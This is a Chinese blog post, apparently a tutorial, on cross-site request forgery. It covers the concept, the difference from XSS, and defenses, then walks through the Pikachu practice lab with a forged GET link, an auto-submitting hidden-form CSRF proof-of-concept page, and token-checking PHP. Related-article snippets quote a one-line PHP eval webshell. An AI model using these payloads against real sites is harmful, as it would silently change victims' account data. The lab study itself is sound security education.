WebSec-CSRF

最新推荐文章于 2022-03-13 19:56:06 发布
最新推荐文章于 2022-03-13 19:56:06 发布
阅读量480 收藏
点赞数
分类专栏: web 文章标签: csrf 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Ga4ra/article/details/122060519
版权

文章目录

1. 关于CSRF

Cross-site request forgery

在CSRF的攻击场景中攻击者会伪造一个请求(这个请求一般是一个链接),然后欺骗目标用户进行点击,用户一旦点击了这个请求,整个攻击就完成了。所以CSRF攻击也成为"one click"攻击。

这也是为什么很多网站上点击外链会有提醒。

判断一个网站是否存在CSRF漏洞,其实就是判断其对关键信息(比如密码等敏感信息)的操作(增删改)是否容易被伪造。另外最好收集下网站信息,用自己的账户确认下凭证有效期,退出浏览器后cookie是否还有效等,关键是抓下敏感操作的数据包,看有没有token,没有则大概率有csrf。

user web site web site(hacked) 浏览并登录 验证通过 产生cookie 未登出正常网站就访问危险网站 请求访问正常网站 使用cookie访问 user web site web site(hacked)

条件:

  • 网站没有做好csrf防范;
  • 目标已登录, session未过期;
  • 目标点击了伪造的链接。

当然,如果网站有xss漏洞,欺骗目标访问了有xss脚本的页面拿到cookie,就能登录目标账号了。

所以,CSRF与XSS的区别是:CSRF借用户的权限完成攻击,攻击者并没有拿到用户的权限,而XSS直接盗取到了用户的权限,然后实施破坏。

当然也不要与越权混淆。

1.1 防范

  1. 对敏感信息的操作增加安全的token;

  2. 关于会话

    • 不在客户端保存敏感信息;
    • 设置会话超时或过期机制;
    • 关闭浏览器或页面时会话过期。

  3. 访问控制:

    • 敏感信息修改使用post,别用get;
    • http referer限制源页面;
    • 对敏感信息的操作实施二次认证等安全的逻辑流程,比如修改密码时,需要先校验旧密码等;

  4. 敏感信息的操作增加安全的验证码;

2. 靶场练习

2.1 pikachu

csrf(get)

提示有这么些用户:

vince/allen/kobe/grady/kevin/lucy/lili,
密码全部是123456

登录vince,修改一些个人信息抓包

GET /pk/vul/csrf/csrfget/csrf_get_edit.php?sex=boy&phonenum=18626545453&add=chain&email=vince%40test.commmmmm&submit=submit HTTP/1.1
Host: 10.10.10.133
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://10.10.10.133//pk/vul/csrf/csrfget/csrf_get_edit.php
Cookie: PHPSESSID=lk7n7ne6t2humik32jov86hm87
Upgrade-Insecure-Requests: 1

是个get请求,并且没有token

现在登录一下allen,查看一下个人信息:

姓名:allen
性别:boy
手机:13676767767
住址:nba 76
邮箱:allen@test.com

访问一下这个链接

http://10.10.10.133//pk/vul/csrf/csrfget/csrf_get_edit.php?sex=boy&phonenum=13676767767&add=nba%2077&email=allen@test.commmmmm&submit=submit

成功修改allen的个人信息:

姓名:allen
性别:boy
手机:13676767767
住址:nba 77
邮箱:allen@test.commmmmm

csrf(post)

前端、账户和csrf get都一样,请求变成了post, 并且仍然没有token。

bp右键engagement tools 可以生成csrf poc,保存为csrf_post.html。

<html>
    <script>                                                                                                       <!-- 这个script是用来自动提交表单的 -->
        window.onload = function() {
        document.getElementById("submit").click();
        }
    </script>              
    <body>
            <form action="http://10.10.10.133/pk/vul/csrf/csrfpost/csrf_post_edit.php" method="POST">    
                <input type="hidden" name="sex" value="girl" />
                <input type="hidden" name="phonenum" value="12345678922" />
                <input type="hidden" name="add" value="usa" />
                <input type="hidden" name="email" value="xiannv@pikachu.com" />
                <input type="hidden" name="submit" value="submit" />
	            <input id="submit" type="submit" value="Submit request" style="display:none"/>                    <!-- style设置为display:none起到隐藏submit按钮的作用 -->
            </form>
    </body>
</html>

现在登录为lili,访问http://10.10.10.133/csrf_post.html。 当然正常应该在另外一台攻击机上搭建个http服务。

lili的个人信息修改成功:

姓名:lili
性别:xxx
手机:xxx
住址:xxx
邮箱:xxx

csrf(token)

这次是有token参数的get请求, 没办法修改个人信息了。

GET /pk/vul/csrf/csrftoken/token_get_edit.php?sex=boy&phonenum=18626545453&add=chain&email=vinceeee%40test.com&token=3971861c1589b11b09825241405&submit=submit 

<form method="get">
    <h1 class="per_title">hello,vince,欢迎来到个人会员中心 | <a style="color:bule;" href="token_get.php?logout=1">退出登录</a></h1>
    <p class="per_name">姓名:vince</p>
    <p class="per_sex">性别:<input type="text" name="sex" value="boy"/></p>
    <p class="per_phone">手机:<input class="phonenum" type="text" name="phonenum" value="18626545453"/></p>    
    <p class="per_add">住址:<input class="add" type="text" name="add" value="chain"/></p> 
    <p class="per_email">邮箱:<input class="email" type="text" name="email" value="vince@test.commmmmm"/></p>
    <input type="hidden" name="token" value="3971861c1589b11b09825241405" />
    <input class="sub" type="submit" name="submit" value="submit"/>
</form>

后台token_get_edit.php编辑个人信息时,与会话中的token对比:

if(isset($_GET['submit'])){
    if($_GET['sex']!=null && $_GET['phonenum']!=null && $_GET['add']!=null && $_GET['email']!=null && $_GET['token']==$_SESSION['token']){
        //转义
        $getdata=escape($link, $_GET);
        $query="update member set sex='{$getdata['sex']}',phonenum='{$getdata['phonenum']}',address='{$getdata['add']}',email='{$getdata['email']}' where username='{$_SESSION['csrf']['username']}'";
        $result=execute($link, $query);
        //没有修改,点击提交,也算修改成功
        if(mysqli_affected_rows($link)==1 || mysqli_affected_rows($link)==0){
            header("location:token_get.php");
        }else {
            $html1.="<p>修改失败,请重新登录</p>";

        }
    }
}
//生成token
set_token();


// function.php
//生成一个token,以当前微妙时间+一个5位的前缀
function set_token(){
    if(isset($_SESSION['token'])){
       unset($_SESSION['token']);
    }
    $_SESSION['token']=str_replace('.','',uniqid(mt_rand(10000,99999),true));
}
CodeStarr
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
csrf漏洞防御方案_CSRF 漏洞原理详解及防御方法
weixin_35474374的博客
01-14 2898
跨站请求伪造:攻击者可以劫持其他用户进行的一些请求,利用用户身份进行恶意操作。例如:请求http://x.com/del.php?id=1是一个删除ID为1的账号,但是只有管理员才可以操作,如果攻击者把这个页面嵌套到其他网站中“http://x.com/del.php?id=1”> 再把这个页面发送给管理员,只要管理员打开这个页面,同时浏览器也会利用当前登陆的这个管理账号权限发出:http:...
websec-readthedocs-io-zh-latest.epub
01-23
websec-readthedocs-io-zh-latest.epub
web Sec
kkwant的博客
11-27 208
课程大纲介绍及实验环境部署 暴力破解原理和测试流程 基于表单的暴力破解实验演示及burpsute使用介绍 验证码绕过-on client相关问题 验证码绕过之服务端相关问题 暴力破解防范措施和防范误区 xss基本概念和原理介绍 xss绕过思路讲解和案例演示 xss之HTMLspecialchars绕过演示 xss防范措施及href和js输出点的案例演示 从一个基础的反射性xss来进一步认识...
WebSec-sqli
Starr
12-23 805
文章目录1. 关于sql注入1.1 分类按语句及执行结果划分(首选思路)根据http请求划分根据传入参数类型划分1.2 原理union报错注入updatexmlfloor盲注暴力破解1.3 防范2. 靶场练习pikachu数字型注入(post)字符型注入(get)搜索型注入xx型注入insert/update注入delete注入http header注入布尔盲注时间盲注宽字节注入 1. 关于sql注入 #mermaid-svg-mQEMoK2dKkTJBSf4 .label{font-family:'tre
WebSec-Fileupload
Starr
12-23 897
文章目录1. Fileupload2. 靶场练习2.1 pikachuclientcheckMIME typegetimagesize 1. Fileupload 场景:上传头像、上传附件等 在设计文件上传功能时,一定要对传进来的文件进行严格的安全检查。比如: 验证文件类型、后缀名、大小; 验证文件的上传方式; 对文件进行一定复杂的重命名; 不要暴露文件上传后的路径; 权限控制,上传的文件夹不能有可执行权限。 … 2. 靶场练习 muma.php先准备好: <?php eval($_GET["va
WebSec-xss
Starr
12-21 248
文章目录1. 关于xss1.1 分类1.2 和csrf区分一下1.3 措施1.3.1 编码1.3.2 过滤html实体CSP1.3.3 校正1.4 绕过2. 靶场练习2.1 pikachu反射型(GET)反射型(POST)存储型XSSDOM xssDOM xss-xxss盲打xss过滤htmlspecialcharsxss href输出xss js输出pkxss-盗取cookiepkxss-钓鱼pkxss-键盘记录 1. 关于xss cwe: https://cwe.mitre.org/data/defin
Django之CSRF
phluo的博客
07-07 127
csrf(跨站请求伪造),django自带的csrf中间件需要对post请求进行验证,如果注释该中间件,则不进行验证,任何网站发过来的post请求均可以通过 以下模拟跨站请求攻击: 正常的请求方式为test与index,攻击网页为attack def test(request): res = {"state":True,"msg":contents} if request.met...
WebSec-SSRF
Starr
12-24 2122
文章目录1. About SSRF2. 靶场练习pikachussrf(curl)ssrf(file_get_content) 1. About SSRF SSRF, Server-Side Request Forgery, 服务器端请求伪造 和CSRF做好区分。 漏洞原因:服务端提供了从其他服务器应用获取数据的功能,但又没有对目标地址做严格过滤与限制导致攻击者可以传入任意的地址来让后端服务器对其发起请求,并返回对该目标地址请求的数据。 PHP中下面函数的使用不当会导致SSRF: file_get_cont
CSRF跨站请求伪造
菜鸟腾飞
07-24 280
CSRF漏洞详细说明 通常情况下,有三种方法被广泛用来防御CSRF攻击:验证token,验证HTTP请求的Referer,还有验证XMLHttpRequests里的自定义header。鉴于种种原因,这三种方法都不是那么完美,各有利弊。  二 CSRF的分类 在跨站请求伪造(CSRF)攻击里面,攻击者通过用户的浏览器来注入额外的网络请求,来破坏一个网站会话的完整性。而浏览器的安全...
WebSec-login:这是一个学校项目
03-11
Web登录 这是一个学校项目
websec-check:Firefox 服务的网络安全检查表
05-29
网络安全检查 针对 Firefox 服务网络安全检查表。 Markdown 问题模板: Risk Management --------------- * [ ] The service must have performed a Rapid Risk Assessment ... You need to have access to the ...
websec-weekly:https 背后的数据库、API 和管理器
06-17
有了这个 repo 中的代码,我相信每个人都可以访问构成 Websec Weekly 上所有新闻通讯的内容和数据。 目前,有两个主要管理器负责分发从 API 收集的信息: 生成每周通讯,然后发送到您的电子邮件 HipChat 通知...
detectron2-readthedocs-io-en-latest.zip
02-08
detectron2的doc文档https://detectron2.readthedocs.io/tutorials/datasets.html
HTTPS双向认证
Starr
02-28 6573
文章目录双向认证服务端客户端(问题残留) 双向认证 C/S两端分别生成密钥对,交换公钥,基于公钥验证另一端。 第一步,创建密钥对,把公钥存储为自签名、PEM编码的证书。用openssl即可,这里以一个HTTPS服务端为例: openssl req -nodes -x509 -newkey rsa:4096 -keyout serverKey.pem -out serverCrt.pem -days 365 serverKey.pem包含服务器的私钥,需要保护;serverCrt.pem包含服务器的公钥,用
sqlmap功能梳理
Starr
03-13 2255
文章目录1. Target连接数据库加载文件2. Requestcookiehost、UA等其它http头部认证代理延迟、超时与重置随机参数安全模式忽略其它3. Optimization4. Injection指定DBMS指定系统sqlmap机制开关无效值替换指定payload前后缀设置tamper绕过waf脚本5. Detection探测levelrisk页面比较6. sqli techniqueDNS攻击!!!二次注入7. 指纹8. Enumeration检索信息经典套路其它(部分):9. Brute
WebSec-php Unserialize
Starr
12-24 2175
文章目录About PHP Serialize and Unserialize靶场练习pikachu About PHP Serialize and Unserialize 序列化:把一个对象变成可传输或存储的形式。反之则是反序列化。 <?php class Foobar{ public $v1 = "1"; protected $v2 = "22"; private $v3 = "333";
DVWA 文件包含及上传漏洞
Starr
03-07 2039
文章目录1. DVWA File InclusionLow levelMedium levelHigh levelImpossible level2. DVWA File uploadLow levelMedium levelHigh levelImpossible Level 1. DVWA File Inclusion Low level url路径: /dvwa/vulnerabilities/fi/index.php?page=include.php 可以看出page参数对应的php会被包含,尝试
WebSec-Over Permission
Starr
12-24 2036
文章目录1. 关于越权2. 靶场练习2.1 pikachu水平越权垂直越权 1. 关于越权 两种,水平越权和垂直越权。 一般越权漏洞容易出现在权限页面(需要登录的页面)增、删、改、查的的地方。 后台权限管理中应该遵守: 使用最小权限原则对用户进行赋权; 使用合理(严格)的权限校验规则; 使用后台登录态作为条件进行权限判断,别动不动就瞎用前端传进来的条件; 后台检查登录状态不够严谨,可能导致越权。 挖掘方法: 登录后,增删改查操作抓一下包,修改用户名试试; 分析管理员操作的数据包,尝试使用
DVWA-CSRF
Starr
03-08 1683
文章目录CSRFLow levelMedium levelHigh levelImpossible level CSRF 之前的笔记:https://blog.csdn.net/Ga4ra/article/details/122060519 Low level 题目是一个修改密码的页面,修改密码点击提交,url如下: /dvwa/vulnerabilities/csrf/?password_new=aaa&password_conf=aaa&Change=Change# 这个页面任意访问,

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值